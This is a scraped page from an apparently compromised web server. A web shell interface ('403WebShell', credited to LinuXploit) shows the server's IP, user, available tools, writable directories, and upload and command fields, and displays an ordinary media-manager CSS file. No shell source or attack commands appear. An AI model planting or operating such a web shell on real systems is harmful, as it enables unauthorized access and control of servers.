Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/theyoungdesigners_com/modules/mediaManager/static/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/theyoungdesigners_com/modules/mediaManager/static/media-manager.css
.media-button {
	font-family: "Font Awesome 5 Free" !important;
	padding: 4px;
}
.popup-mediamanager {
	z-index: 150;
}

.showMediaLibrary-wrapper {
	width: 100%;
}

/* - LIST ------------------------------------- */

.table-mm {
	width: 100%;
	max-width: 100%;
	margin-bottom: 20px;

	background-color: transparent;
	border-spacing: 0;
	border-collapse: collapse;
}

.table-responsive {
	min-height: .01%;
	overflow-x: auto;
}

.table-striped > tbody > tr:nth-of-type(2n+1) {
	background-color: #fff;
}
.table-striped > tbody > tr:nth-of-type(2n) {
	background-color: #eef;
}

.table-mm > tbody > tr > td, 
.table-mm > tbody > tr > th, 
.table-mm > tfoot > tr > td, 
.table-mm > tfoot > tr > th, 
.table-mm > thead > tr > td, 
.table-mm > thead > tr > th {
	padding: 8px;
	line-height: 1.42857143;
	vertical-align: top;
	border-top: 1px solid #ddd;
}

.table-mm > tbody > tr > td {
	vertical-align: middle;
}

.table-mm > tbody > tr > td, 
.table-mm > tbody > tr > th, 
.table-mm > tfoot > tr > td, 
.table-mm > tfoot > tr > th, 
.table-mm > thead > tr > td, 
.table-mm > thead > tr > th {
	border-top: 1px solid #444;
}

.gridProps {
	position: relative;
	font-weight: bold;
}

.gridProps a {
	cursor: pointer;
	color: #3BC0FF;
	text-decoration: none;
}

.gridProps i.entry-icon {
	font-size: 1.5em;
	padding-right: 10px;
	width: 32px;
	text-align: center;
}

.media-container.layout-list tr.gridRow {
	height: 115px;
}

.media-container.layout-list .entry-icon {
	font-size: 6em;
	width: 100px;
	vertical-align:middle;
}
/* - TILE ------------------------------------- */

.gridContainer {
	display: flex;
	align-items: stretch;
	flex-flow: row wrap;
	justify-content: flex-start;
}

.gridContainer > * {
/*	align-self: flex-start; */
	align-self: stretch;
}

.gridItem {
	width: 260px;
	text-align: center;
	background-color: #eee;
	border: 1px solid #999;
	padding: 5px;
	margin: 5px;
	position: relative;
	color: #000;
}

.medium-icons .gridItem {
	width: 220px;
}

.gridItem .item-body {
	display: table;
	width: 100%;
	min-height: 102px;
}

.gridContainer .item-body img {
	max-width: 100%;
}

.medium-icons .gridItem .item-body {
	min-height: 82px;
}

.gridItem .item-body > * {
	display: table-cell;
	vertical-align: middle;
}

.item-body a {
	color: #3BC0FF !important;
	cursor: pointer;
	text-decoration: none;
}

.gridItem i.entry-icon {
	font-size: 6em;
}

.gridItem .item-footer {
	color: #515151;
	height: 25px;
	width: 240px;
	white-space: nowrap;
	overflow: hidden;
	text-overflow: ellipsis;
	margin-top: 5px;
	margin-bottom: 0;
	hyphens: auto;
	font-weight: bold;
}

.medium-icons .gridItem .item-footer {
	width: 208px;
}

.media-navigation {
	line-height: 1.05;
	padding: 8px 0 8px 10px;
	background-color: #d2d2cf;
	font-size: 16pt;
}

.sort-row i {
	padding-left: 5px;
	cursor: pointer;
}
.sort-row i.fa-sort {
	opacity: 0.2;
}

.gridProps.large img {
	vertical-align: middle;
	width: 277px;
}

.gridProps.large span {
	padding-left: 5px;
}

.gridProps .item-grip {
	opacity: 0.5;
	padding-right: 10px;
}

.gridProps.large .item-grip {
	font-size: 1.5em;
}

/* -------------------------------------- */

.dark-mode {
	background-color: #111;
}

.dark-mode .table-mm tr {
	color: #fff;
}

.dark-mode .gridItem {
	color: #fff;
	background-color: #333;
	border: 1px solid #ccc;
}

.dark-mode .media-navigation {
	background-color: transparent;
}

.dark-mode .table-striped > tbody > tr:nth-of-type(2n+1) {
	background-color: #111;
}
.dark-mode .table-striped > tbody > tr:nth-of-type(2n) {
	background-color: #444;
}

.dark-mode .gridItem .item-footer {
	color: #fff;
}


/* -------------------------------------- */

.bind-media {
	min-height:700px;
	padding: 2px;
	position: relative;
}

.bind-media .droparea-area {
	position: absolute;
	top: 0;
	left: 0;
	bottom: 0;
	right: 0;
	z-index: 200;
	display: none;
}

.media-navigation .group {
	display: inline-block;
	margin-right: 20px;
}

.button-media {
	border-style: outset;
	border-radius: 5px;
	width: 34px;
	color: #555;
}

.button-media.pressed {
	border-style: inset !important;
	border-radius: 5px;
	background-color: #80cfff;
}

.button-media[disabled] {
	background-color: #868484;
	border-color: #888 !important;
}

.media-container {
	
}

.table-hover > tbody > tr.gridRow:hover {
	background-color: #f0a310 !important;
}

div.over {
	outline: 7px dashed #0087ff;
	outline-offset: -7px;
	outline-radius: 20px;
	border-radius: 20px;
	cursor: copy;
}

.context-icon {
	float: right;
}

.context-menu-item.default span {
	font-weight: bold;
}

.context-menu-item.smallcap span {
	font-variant-caps: small-caps;
}

.gridItem.image-vnd-microsoft-icon .item-body img,
.gridItem.image-svg .item-body svg,
.gridItem.image-svg-xml .item-body svg {
	height: 102px;
	max-width: 248px;
}


.gridItem.image-svg .item-body svg,
.gridItem.image-svg-xml .item-body svg {
	color: #333;
}

.dark-mode .gridItem.image-svg .item-body svg,
.dark-mode .gridItem.image-svg-xml .item-body svg {
	color: #eee;
}

.medium-icons .gridItem.image-vnd-microsoft-icon .item-body img,
.medium-icons .gridItem.image-svg .item-body svg,
.medium-icons .gridItem.image-svg-xml .item-body svg {
	height: 82px;
	max-width: 208px;
}

.icon-tabler {
	width: 248px;
}

.medium-icons .icon-tabler {
	width: 208px;
}

.controls .icon-preview {
	vertical-align: middle;
	display: inline-block;
}
.controls .icon-preview img,
.controls .icon-preview svg {
	height: 40px;
	max-width: 70px;
}
.controls .iconname {
	font-size: 18px;
	font-weight: bold;
}

.bind-iconselect {
	cursor: pointer;
}

.popup-dialog .media-container {
	overflow-y: scroll;
	height: 630px;
}

.icon-select .popup-dialog {
	overflow-y: hidden;
}

Youez - 2016 - github.com/yon3zu
LinuXploit